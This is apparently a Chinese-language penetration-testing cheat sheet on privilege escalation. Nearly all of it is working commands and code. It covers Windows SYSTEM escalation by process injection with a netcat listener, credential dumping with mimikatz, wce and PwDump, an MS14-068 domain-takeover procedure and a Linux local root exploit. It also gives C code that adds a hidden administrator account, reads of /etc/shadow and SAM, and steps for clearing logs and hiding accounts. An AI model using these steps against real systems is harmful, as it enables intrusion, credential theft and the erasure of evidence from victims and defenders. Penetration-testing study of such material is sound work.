【渗透测试笔记】之【提权】

操作系统默认用户

• Windows
  User
  Administrator
  System
• Linux
  User
  Root

Windows本地提权

USER->System

• WinXP、03

at 10:11 /intertractive cmd

• Win7、8

sc Create syscmd binPath="cmd /K start" type=own type=interact
sc start syscmd

• 利用开发工具
  首先下载微软开发工具包:https://download.sysinternals.com/files/SysinternalsSuite.zip
  上传里面的PsExec.exe到服务器
  命令行先进入上传的路径，执行：

PsExec.exe -s cmd

轻松获得系统权限

• 注入进程提权（隐蔽，不会增加新进程）
  下载工具（系统会杀360也会杀）：https://www.tarasco.org/security/Process_Injector/processinjector.zip
  上传到目标系统
  进入上传的路径
  查看当前可注入进程：

pinjector.exe -l

选择一个system用户进程（如services.exe）
注入进程，并且开放侦听一个端口：

pinjector.exe -p 656 cmd 5555

此时就可以连接目标

nc -nv 192.168.1.119 5555

本地缓存密码

各种提取脚本
http://www.nirsoft.net/

提取Windows密码：

PwDump

用kali下的/usr/share/windows-binaries/fgdump文件里的PwDump.exe脚本
复制密文，进行哈希解密（网站或ophcrack）
ophcrack：
Load-PwDump file-Crack

wce

利用kali下的/usr/share/wce文件里的wce-universal.exe脚本

wce-universal.exe -l  # 提取密码哈希值
wce-universal.exe -w  # 提取密码明文

防止WCE攻击：
打开注册表编辑器：

regedit

找到
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
将wdigest删掉（注意不要留换行），但是只能单用户登录

mimikatz

在kali的/usr/share/windows-resources下（版本不同可用find / -iname mimikatz查找其位置）
拷贝到Windows，终端找到mimikatz.exe，回车进入

• 查看帮助

::

• 提权

privilege::debug

• 查看密码

sekurlsa::  # 查看命令的子命令
sekurlsa::logonPasswords
sekurlsa::wdigest  # 缓存密码
lsadump::sam  # 查看sam数据库

• 查看进程

process::list

• 清除安全日志

event::clear
event::drop  # 不再产生日志

利用漏洞提权

Windows

如何将py脚本转为exe可执行文件

1. 下载Pyinstaller：https://pypi.org/project/PyInstaller/#files
2. 进入下载的文件并执行（Linux环境下，Windows需要Python环境）

./pyinstaller.py --onefile test.py

MS14-068漏洞

在本机有administrator权限，获得域权限

1. 利用kali搜索漏洞利用脚本：

searchsploit ms14-068

2. 进入脚本路径利用脚本

./35474.py -u a@test.com -s userSID -d dcIP
                |             |
               本机用户名    本机在域里的SID（利用命令whami获取，whami在前面的微软开发工具里有）

3. 回车输入本机密码后会在当前路径生成一个TGT票据文件，将票据拷贝到mimikatz目录下
4. 终端打开mimikatz.exe后执行

kerberos::ptc <票据文件>

显示

Injecting ticket:OK

代表成功获得DC权限

Linux

Ubuntu11.10

在kali将漏洞利用脚本拷贝到ubuntu

searchsploit 18411.c
scp /usr/share/exploitdb/exploits/linux/local/18411.c username@192.168.1.149:/home/username/
yes

ubuntu编译运行脚本后普通用户即可获得root权限

gcc 18411.c -o 18411  # 早期版本默认没有gcc，可以编译后再拷贝过来
chmod +x 18411
./18411

利用配置不当提权

（相比漏洞提权更常用的方法）

Windows

查看所有exe文件的权限并保存到当前目录下

icacls c:\WINDOWS\*.exe /save result.txt /t

如果某一程序有FA;;;BU（快速查找）的程序，就可以利用
将c语言脚本文件编译成exe执行文件

i586-mingw32msvc-gcc -o admin.exe admin.c

admin.c

#include <stdlib.h>
int main()
{
	int i;
	i=system {"net localgroup administrators a /add"};
	return 0;
}

Windows上创建一个a用户

net user a a /add

并且将有管理员权限的程序名改为可执行脚本
下次启动，a就会被加入管理员组

Linux

找到权限为777的可执行文件

find / -perm 777 -exec ls -l {} \;

查看系统的配置文件

• 应用连接数据库的配置文件
• 后台服务运行账号

基本信息收集

Linux

命令

• /etc/resolv.conf
• /etc/passwd
• /etc/shadow
• whoami,who -a
• ifconfig -a,iptables -L -n,netstat -rn
• uname -a,ps aux
• apkg -l | head

敏感数据

• /etc;/usr/local/tec
• /etc/passwd;/etc/shadow
• 用户目录下.ssh;.gnupg 公私钥
• The e-mail and data files
• 业务数据库；身份认证服务器数据库
• /tmp

Windows

• ipconfig /all,ipconfig /displaydns,netstat -bnao,netstat -r
• net view,net view /domian
• net user /domain,net user %username% /domain
• net accounts,net share
• net localgroup administrators username /add
• net group “Domain Controllers” /domain
• net share name$C:\ /unlimited
• net user username /active:yes /domain

敏感数据

• SAM数据库；注册表文件
• %SYSTEMROOT%\repair\SAM（副本）
• %SYSTEMROOT%System32\config\RegBack|SAM（备份）
• 业务数据库；省份认证数据库
• 临时文件目录
• UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\

隐藏痕迹

Windows

• 禁止在登录界面显示新建账号

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v **username** /T REG_DWORD /D 0

• 删除日志

del %WINDIR%\*.log /a/s/q/f

Linux

• /var/log下的auth.log/secure/btmp/wtmp/lastlog/failog